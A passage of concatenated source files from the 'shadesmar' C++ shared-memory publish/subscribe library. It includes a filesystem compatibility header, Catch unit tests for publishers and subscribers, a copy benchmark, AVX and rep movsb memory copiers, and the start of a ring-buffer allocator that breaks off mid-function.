std::fstream file;
file.open(entry.path().generic_string(), std::ios::in);
std::string name;
file >> name;
names.push_back(name);
}
return names;
}
inline bool exists(const std::string &name) {
auto existing_names = get_tmp_names();
for (auto &existing_name : existing_names) {
if (existing_name == name) {
return true;
}
}
return false;
}
inline void delete_topics() { std::filesystem::remove_all(tmp_prefix); }
} // namespace shm::memory::tmp
#endif // INCLUDE_SHADESMAR_MEMORY_TMP_H_
<|start_filename|>include/shadesmar/memory/filesystem.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
#define INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
// Check for feature test macro for <filesystem>
#if defined(__cpp_lib_filesystem)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 0
// Check for feature test macro for <experimental/filesystem>
#elif defined(__cpp_lib_experimental_filesystem)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 1
// Check if the header "<filesystem>" exists
#elif __has_include(<filesystem>)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 0
// Check if the header "<filesystem>" exists
#elif __has_include(<experimental/filesystem>)
#define INCLUDE_STD_FILESYSTEM_EXPERIMENTAL 1
// Fail if neither header is available with a nice error message
#else
#error Could not find system header "<filesystem>"
#endif // defined(__cpp_lib_filesystem)
// We priously determined that we need the exprimental version
#if INCLUDE_STD_FILESYSTEM_EXPERIMENTAL
// Include it
#include <experimental/filesystem>
// We need the alias from std::experimental::filesystem to std::filesystem
namespace std {
namespace filesystem = experimental::filesystem;
}
// We have a decent compiler and can use the normal version
#else
// Include it
#include <filesystem>
#endif // INCLUDE_STD_FILESYSTEM_EXPERIMENTAL
#endif // INCLUDE_SHADESMAR_MEMORY_FILESYSTEM_H_
<|start_filename|>test/pubsub_test.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include <iostream>
#include <mutex>
#include <thread>
#include <vector>
#ifdef SINGLE_HEADER
#include "shadesmar.h"
#else
#include "shadesmar/pubsub/publisher.h"
#include "shadesmar/pubsub/subscriber.h"
#endif
#define CATCH_CONFIG_MAIN
#include "catch.hpp"
TEST_CASE("single_message") {
std::string topic = "single_message";
int message = 3;
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == message);
}
TEST_CASE("multiple_messages") {
std::string topic = "multiple_messages";
std::vector<int> messages = {1, 2, 3, 4, 5};
shm::pubsub::Publisher pub(topic);
std::vector<int> answers;
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
for (int i = 0; i < messages.size(); ++i) {
sub.spin_once();
}
REQUIRE(answers == messages);
}
TEST_CASE("alternating_pub_sub") {
std::string topic = "alternating_pub_sub";
int message = 3;
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < 10; i++) {
pub.publish(reinterpret_cast<void *>(&i), sizeof(int));
sub.spin_once();
REQUIRE(answer == i);
}
}
TEST_CASE("single_pub_multiple_sub") {
std::string topic = "single_pub_multiple_sub";
std::vector<int> messages = {1, 2, 3, 4, 5};
shm::pubsub::Publisher pub(topic);
int n_subs = 3;
std::vector<std::vector<int>> vec_answers;
for (int i = 0; i < n_subs; ++i) {
std::vector<int> answers;
vec_answers.push_back(answers);
}
std::vector<shm::pubsub::Subscriber> subs;
for (int i = 0; i < n_subs; i++) {
auto callback = [idx = i, &vec_answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
vec_answers[idx].push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
subs.push_back(std::move(sub));
}
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
SECTION("messages by subscribers") {
for (int i = 0; i < messages.size(); ++i) {
std::cout << "Subscribe message: " << i << std::endl;
for (int s = 0; s < n_subs; ++s) {
std::cout << "Subscriber: " << s << std::endl;
subs[s].spin_once();
}
}
}
SECTION("subscribers by messages") {
for (int s = 0; s < n_subs; ++s) {
std::cout << "Subscriber: " << s << std::endl;
for (int i = 0; i < messages.size(); ++i) {
std::cout << "Subscribe message: " << i << std::endl;
subs[s].spin_once();
}
}
}
for (int i = 0; i < n_subs; ++i) {
REQUIRE(vec_answers[i] == messages);
}
}
TEST_CASE("multiple_pub_single_sub") {
std::string topic = "multiple_pub_single_sub";
int n_pubs = 3;
int n_messages = 5;
std::vector<shm::pubsub::Publisher> pubs;
for (int i = 0; i < n_pubs; ++i) {
shm::pubsub::Publisher pub(topic);
pubs.push_back(std::move(pub));
}
std::vector<int> answers;
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
SECTION("messages by publishers") {
int msg = 1;
for (int m = 0; m < n_messages; ++m) {
for (int p = 0; p < n_pubs; ++p) {
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
}
SECTION("publishers by messages") {
int msg = 1;
for (int p = 0; p < n_pubs; ++p) {
for (int m = 0; m < n_messages; ++m) {
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
}
shm::pubsub::Subscriber sub(topic, callback);
std::vector<int> expected;
for (int i = 0; i < n_messages * n_pubs; ++i) {
sub.spin_once();
expected.push_back(i + 1);
}
REQUIRE(expected == answers);
}
TEST_CASE("multiple_pub_multiple_sub") {
std::string topic = "multiple_pub_multiple_sub";
int n_pubs = 3, n_subs = 3, n_messages = 5;
REQUIRE(n_pubs == n_subs);
std::vector<shm::pubsub::Publisher> pubs;
for (int i = 0; i < n_pubs; ++i) {
shm::pubsub::Publisher pub(topic);
pubs.push_back(std::move(pub));
}
std::vector<int> messages;
int msg = 1;
for (int p = 0; p < n_pubs; ++p) {
for (int m = 0; m < n_messages; ++m) {
messages.push_back(msg);
pubs[p].publish(reinterpret_cast<void *>(&msg), sizeof(int));
msg++;
}
}
std::vector<std::vector<int>> vec_answers;
for (int i = 0; i < n_subs; ++i) {
std::vector<int> answers;
vec_answers.push_back(answers);
}
std::vector<shm::pubsub::Subscriber> subs;
for (int i = 0; i < n_subs; i++) {
auto callback = [idx = i, &vec_answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
vec_answers[idx].push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
subs.push_back(std::move(sub));
}
for (int s = 0; s < n_subs; ++s) {
for (int i = 0; i < messages.size(); ++i) {
subs[s].spin_once();
}
}
for (int i = 0; i < n_subs; ++i) {
REQUIRE(vec_answers[i] == messages);
}
}
TEST_CASE("spin_without_new_msg") {
std::string topic = "spin_without_new_msg";
int message = 3;
shm::pubsub::Publisher pub(topic);
int count = 0, answer;
auto callback = [&count, &answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
++count;
};
shm::pubsub::Subscriber sub(topic, callback);
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == 3);
REQUIRE(count == 1);
++message;
sub.spin_once();
REQUIRE(count == 1);
++message;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
sub.spin_once();
REQUIRE(answer == 5);
REQUIRE(count == 2);
}
TEST_CASE("sub_counter_jump") {
std::string topic = "sub_counter_jump";
shm::pubsub::Publisher pub(topic);
int answer;
auto callback = [&answer](shm::memory::Memblock *memblock) {
answer = *(reinterpret_cast<int *>(memblock->ptr));
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < shm::memory::QUEUE_SIZE; ++i) {
pub.publish(reinterpret_cast<void *>(&i), sizeof(int));
}
sub.spin_once();
int lookback =
shm::pubsub::jumpahead(shm::memory::QUEUE_SIZE, shm::memory::QUEUE_SIZE);
REQUIRE(answer == lookback);
int moveahead = shm::memory::QUEUE_SIZE - lookback + 1;
for (int i = 0; i < moveahead; ++i) {
int message = lookback + i;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
sub.spin_once();
REQUIRE(answer == moveahead);
}
TEST_CASE("sub_after_pub_dtor") {
std::string topic = "sub_after_pub_dtor";
std::vector<int> messages = {1, 2, 3, 4, 5};
std::vector<int> answers;
{
shm::pubsub::Publisher pub(topic);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
}
{
auto callback = [&answers](shm::memory::Memblock *memblock) {
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Subscriber sub(topic, callback);
for (int i = 0; i < messages.size(); ++i) {
sub.spin_once();
}
}
REQUIRE(answers == messages);
}
TEST_CASE("spin_on_thread") {
std::string topic = "spin_on_thread";
std::vector<int> messages = {1, 2, 3, 4, 5};
std::vector<int> answers;
std::mutex mu;
auto callback = [&answers, &mu](shm::memory::Memblock *memblock) {
std::unique_lock<std::mutex> lock(mu);
int answer = *(reinterpret_cast<int *>(memblock->ptr));
answers.push_back(answer);
};
shm::pubsub::Publisher pub(topic);
for (int message : messages) {
std::cout << "Publishing: " << message << std::endl;
pub.publish(reinterpret_cast<void *>(&message), sizeof(int));
}
shm::pubsub::Subscriber sub(topic, callback);
std::thread th([&]() { sub.spin(); });
while (true) {
std::unique_lock<std::mutex> lock(mu);
if (answers.size() == messages.size()) {
break;
}
}
sub.stop();
th.join();
REQUIRE(answers == messages);
}
// TODO(squadricK): Add tests
// - All the multiple pub/sub tests with parallelism
<|start_filename|>benchmark/dragons.cpp<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#include "shadesmar/memory/dragons.h"
#include <benchmark/benchmark.h>
#include <cstring>
#define STARTRANGE 1 << 5 // 32 bytes
#define ENDRANGE 1 << 23 // 8 MB
#define SHMRANGE STARTRANGE, ENDRANGE
template <class CopierT>
void CopyBench(benchmark::State &state) { // NOLINT
CopierT cpy;
size_t size = state.range(0);
auto *src = cpy.alloc(size);
auto *dst = cpy.alloc(size);
std::memset(src, 'x', size);
for (auto _ : state) {
cpy.shm_to_user(dst, src, size);
benchmark::DoNotOptimize(dst);
}
cpy.dealloc(src);
cpy.dealloc(dst);
state.SetBytesProcessed(size * static_cast<int64_t>(state.iterations()));
}
#define SHM_COPY_BENCHMARK(c) \
BENCHMARK_TEMPLATE(CopyBench, c)->Range(SHMRANGE);
SHM_COPY_BENCHMARK(shm::memory::DefaultCopier);
#ifdef __x86_64__
SHM_COPY_BENCHMARK(shm::memory::dragons::RepMovsbCopier);
#endif
#ifdef __AVX__
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxUnrollCopier);
#endif
#ifdef __AVX2__
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncPFCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncUnrollCopier);
SHM_COPY_BENCHMARK(shm::memory::dragons::AvxAsyncPFUnrollCopier);
#endif
BENCHMARK_MAIN();
<|start_filename|>include/shadesmar/memory/dragons.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
// HERE BE DRAGONS
#ifndef INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
#define INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
#include <immintrin.h>
#include <cstdlib>
#include <thread>
#include <vector>
#include "shadesmar/memory/copier.h"
#include "shadesmar/memory/memory.h"
namespace shm::memory::dragons {
//------------------------------------------------------------------------------
#ifdef __x86_64__
static inline void _rep_movsb(void *d, const void *s, size_t n) {
asm volatile("rep movsb"
: "=D"(d), "=S"(s), "=c"(n)
: "0"(d), "1"(s), "2"(n)
: "memory");
}
class RepMovsbCopier : public Copier {
public:
using PtrT = uint8_t;
void *alloc(size_t size) override { return malloc(size); }
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_rep_movsb(dst, src, size);
}
void user_to_shm(void *dst, void *src, size_t size) override {
_rep_movsb(dst, src, size);
}
};
#endif // __x86_64__
//------------------------------------------------------------------------------
#ifdef __AVX__
static inline void _avx_cpy(void *d, const void *s, size_t n) {
// d, s -> 32 byte aligned
// n -> multiple of 32
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec--, sVec++, dVec++) {
const __m256i temp = _mm256_load_si256(sVec);
_mm256_store_si256(dVec, temp);
}
}
class AvxCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_cpy(void *d, const void *s, size_t n) {
// d, s -> 32 byte aligned
// n -> multiple of 32
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec--, sVec++, dVec++) {
const __m256i temp = _mm256_stream_load_si256(sVec);
_mm256_stream_si256(dVec, temp);
}
_mm_sfence();
}
class AvxAsyncCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_pf_cpy(void *d, const void *s, size_t n) {
// d, s -> 64 byte aligned
// n -> multiple of 64
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 2; nVec -= 2, sVec += 2, dVec += 2) {
// prefetch the next iteration's data
// by default _mm_prefetch moves the entire cache-lint (64b)
_mm_prefetch(sVec + 2, _MM_HINT_T0);
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
}
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm_sfence();
}
class AvxAsyncPFCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = sizeof(__m256i) * 2;
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX__
static inline void _avx_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec -= 4, sVec += 4, dVec += 4) {
_mm256_store_si256(dVec, _mm256_load_si256(sVec));
_mm256_store_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_store_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_store_si256(dVec + 3, _mm256_load_si256(sVec + 3));
}
}
class AvxUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 0; nVec -= 4, sVec += 4, dVec += 4) {
_mm256_stream_si256(dVec, _mm256_stream_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_stream_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_stream_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_stream_load_si256(sVec + 3));
}
_mm_sfence();
}
class AvxAsyncUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
#ifdef __AVX2__
static inline void _avx_async_pf_cpy_unroll(void *d, const void *s, size_t n) {
// d, s -> 128 byte aligned
// n -> multiple of 128
auto *dVec = reinterpret_cast<__m256i *>(d);
const auto *sVec = reinterpret_cast<const __m256i *>(s);
size_t nVec = n / sizeof(__m256i);
for (; nVec > 4; nVec -= 4, sVec += 4, dVec += 4) {
// prefetch data for next iteration
_mm_prefetch(sVec + 4, _MM_HINT_T0);
_mm_prefetch(sVec + 6, _MM_HINT_T0);
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_load_si256(sVec + 3));
}
_mm256_stream_si256(dVec, _mm256_load_si256(sVec));
_mm256_stream_si256(dVec + 1, _mm256_load_si256(sVec + 1));
_mm256_stream_si256(dVec + 2, _mm256_load_si256(sVec + 2));
_mm256_stream_si256(dVec + 3, _mm256_load_si256(sVec + 3));
_mm_sfence();
}
class AvxAsyncPFUnrollCopier : public Copier {
public:
using PtrT = __m256i;
constexpr static size_t alignment = 4 * sizeof(__m256i);
void *alloc(size_t size) override {
return aligned_alloc(alignment, SHMALIGN(size, alignment));
}
void dealloc(void *ptr) override { free(ptr); }
void shm_to_user(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
void user_to_shm(void *dst, void *src, size_t size) override {
_avx_async_pf_cpy_unroll(dst, src, SHMALIGN(size, alignment));
}
};
#endif // __AVX2__
//------------------------------------------------------------------------------
template <class BaseCopierT, uint32_t nthreads>
class MTCopier : public Copier {
public:
MTCopier() : base_copier() {}
void *alloc(size_t size) override { return base_copier.alloc(size); }
void dealloc(void *ptr) override { base_copier.dealloc(ptr); }
void _copy(void *d, void *s, size_t n, bool shm_to_user) {
n = SHMALIGN(n, sizeof(typename BaseCopierT::PtrT)) /
sizeof(typename BaseCopierT::PtrT);
std::vector<std::thread> threads;
threads.reserve(nthreads);
auto per_worker = div((int64_t)n, nthreads);
size_t next_start = 0;
for (uint32_t thread_idx = 0; thread_idx < nthreads; ++thread_idx) {
const size_t curr_start = next_start;
next_start += per_worker.quot;
if (thread_idx < per_worker.rem) {
++next_start;
}
auto d_thread =
reinterpret_cast<typename BaseCopierT::PtrT *>(d) + curr_start;
auto s_thread =
reinterpret_cast<typename BaseCopierT::PtrT *>(s) + curr_start;
if (shm_to_user) {
threads.emplace_back(
&Copier::shm_to_user, &base_copier, d_thread, s_thread,
(next_start - curr_start) * sizeof(typename BaseCopierT::PtrT));
} else {
threads.emplace_back(
&Copier::user_to_shm, &base_copier, d_thread, s_thread,
(next_start - curr_start) * sizeof(typename BaseCopierT::PtrT));
}
}
for (auto &thread : threads) {
thread.join();
}
threads.clear();
}
void shm_to_user(void *dst, void *src, size_t size) override {
_copy(dst, src, size, true);
}
void user_to_shm(void *dst, void *src, size_t size) override {
_copy(dst, src, size, false);
}
private:
BaseCopierT base_copier;
};
//------------------------------------------------------------------------------
} // namespace shm::memory::dragons
#endif // INCLUDE_SHADESMAR_MEMORY_DRAGONS_H_
<|start_filename|>include/shadesmar/memory/allocator.h<|end_filename|>
/* MIT License
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================*/
#ifndef INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
#define INCLUDE_SHADESMAR_MEMORY_ALLOCATOR_H_
#include <cassert>
#include "shadesmar/concurrency/robust_lock.h"
#include "shadesmar/concurrency/scope.h"
namespace shm::memory {
#define SHMALIGN(s, a) (((s - 1) | (a - 1)) + 1)
inline uint8_t *align_address(void *ptr, size_t alignment) {
auto int_ptr = reinterpret_cast<uintptr_t>(ptr);
auto aligned_int_ptr = SHMALIGN(int_ptr, alignment);
return reinterpret_cast<uint8_t *>(aligned_int_ptr);
}
class Allocator {
public:
using handle = uint64_t;
template <concurrent::ExlOrShr type>
using Scope = concurrent::ScopeGuard<concurrent::RobustLock, type>;
Allocator(size_t offset, size_t size);
uint8_t *alloc(uint32_t bytes);
uint8_t *alloc(uint32_t bytes, size_t alignment);
bool free(const uint8_t *ptr);
void reset();
void lock_reset();
inline handle ptr_to_handle(uint8_t *p) {
return p - reinterpret_cast<uint8_t *>(heap_());
}
uint8_t *handle_to_ptr(handle h) {
return reinterpret_cast<uint8_t *>(heap_()) + h;
}
size_t get_free_memory() {
Scope<concurrent::SHARED> _(&lock_);
size_t free_size;
size_t size = size_ / sizeof(int);
if (free_index_ <= alloc_index_) {
free_size = size - alloc_index_ + free_index_;
} else {
free_size = free_index_ - alloc_index_;
}
return free_size * sizeof(int);
}
concurrent::RobustLock lock_;
private:
void validate_index(uint32_t index) const;
[[nodiscard]] uint32_t suggest_index(uint32_t header_index,
uint32_t payload_size) const;
uint32_t *__attribute__((always_inline)) heap_() {
return reinterpret_cast<uint32_t *>(reinterpret_cast<uint8_t *>(this) +
offset_);
}
uint32_t alloc_index_;
volatile uint32_t free_index_;
size_t offset_;
size_t size_;
};
Allocator::Allocator(size_t offset, size_t size)
: alloc_index_(0), free_index_(0), offset_(offset), size_(size) {
assert(!(size & (sizeof(int) - 1)));
}
void Allocator::validate_index(uint32_t index) const {
assert(index < (size_ / sizeof(int)));
}
uint32_t Allocator::suggest_index(uint32_t header_index,
uint32_t payload_size) const {
validate_index(header_index);
int32_t payload_index = header_index + 1;
if (payload_index + payload_size - 1 >= size_ / sizeof(int)) {
payload_index = 0;
}
validate_index(payload_index);
validate_index(payload_index + payload_size - 1);
return payload_index;
}
uint8_t *Allocator::alloc(uint32_t bytes) { return alloc(bytes, 1); }
uint8_t *Allocator::alloc(uint32_t bytes, size_t alignment) {
uint32_t payload_size = bytes + alignment;
if (payload_size == 0) {
payload_size = sizeof(int);
}
if (payload_size >= size_ - 2 * sizeof(int)) {
return nullptr;
}
if (payload_size & (sizeof(int) - 1)) {
payload_size &= ~(sizeof(int) - 1);
payload_size += sizeof(int);
}
payload_size /= sizeof(int);
Scope<concurrent::EXCLUSIVE> _(&lock_);
const auto payload_index = suggest_index(alloc_index_, payload_size);
const auto free_index_th = free_index_;
uint32_t new_alloc_index = payload_index + payload_size;
if (alloc_index_ < free_index_th && payload_index == 0) {
return nullptr;
}
if (payload_index <= free_index_th && free_index_th <= new_alloc_index) {
return nullptr;
}
if (new_alloc_index == size_ / sizeof(int)) {
new_alloc_index = 0;
if (new_alloc_index == free_index_th) {
